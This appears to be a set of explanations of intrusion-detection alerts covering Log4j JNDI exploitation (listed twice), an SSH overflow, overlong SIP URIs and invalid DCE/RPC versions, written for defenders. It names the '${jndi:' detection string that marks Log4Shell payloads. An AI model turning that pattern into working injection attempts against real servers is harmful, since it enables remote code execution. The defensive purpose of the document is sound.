SERVER-OTHER Apache Log4j logging remote code execution attempt
the alert detects attempts to exploit the Apache Log4j vulnerability for remote code execution. The rule matches on HTTP requests containing the string ${jndi: in the URI. The rule generates an alert when such traffic is detected flowing towards the server on an established connection. This rule helps to identify potential attempts to exploit the known Apache Log4j vulnerabilities and can aid in mitigating the risks associated with this critical security issue.
SERVER-OTHER Apache Log4j logging remote code execution attempt
the alert detects attempts to exploit the Apache Log4j vulnerability for remote code execution. The rule matches on HTTP requests containing the string ${jndi: in the URI. The rule generates an alert when such traffic is detected flowing towards the server on an established connection. This rule helps to identify potential attempts to exploit the known Apache Log4j vulnerabilities and can aid in mitigating the risks associated with this critical security issue.
(spp_ssh) Challenge-Response Overflow exploit
The rule triggers when an attempt is made to exploit an overflow vulnerability in the challenge-response mechanism of SSH. An overflow vulnerability in this context suggests that an attacker is trying to send data that exceeds the allocated buffer size, potentially leading to arbitrary code execution or other security compromises.
(spp_sip) URI is too long
When this rule is triggered, it suggests that the SIP message being analyzed contains a URI (such as a web address or SIP identifier) that exceeds the length limitations specified in the protocol standards. This could be an indication of a malformed or potentially malicious SIP message. This rule is helpful for identifying abnormal or potentially harmful SIP traffic, which could be a result of misconfigurations, malformed requests, or attempts to exploit vulnerabilities in SIP-based systems. When this rule triggers, it's essential to investigate the specific SIP message to understand the nature of the excessive URI length. It might require analyzing the source and destination IP addresses, ports, and the content of the SIP message to determine if it's a legitimate request with an unusually long URI or if it's a malicious attempt to exploit a vulnerability in the SIP implementation.
(dcerpc2) Connection-oriented DCE/RPC – Invalid major version
The rule is triggered when an attempt is made to establish a DCE/RPC connection, but the protocol version specified in the traffic is invalid or not recognized. In this case, the major version is not a valid version for the DCE/RPC protocol. This rule can be used to detect potential attacks or misconfigurations where an attacker is trying to exploit vulnerabilities or conduct unauthorized actions by sending malformed or malicious DCE/RPC traffic with an invalid major version. When this rule is triggered, it indicates that there might be a security issue or a misconfiguration in the network, and further investigation is needed to understand the nature of the traffic and take appropriate actions to mitigate any potential risks.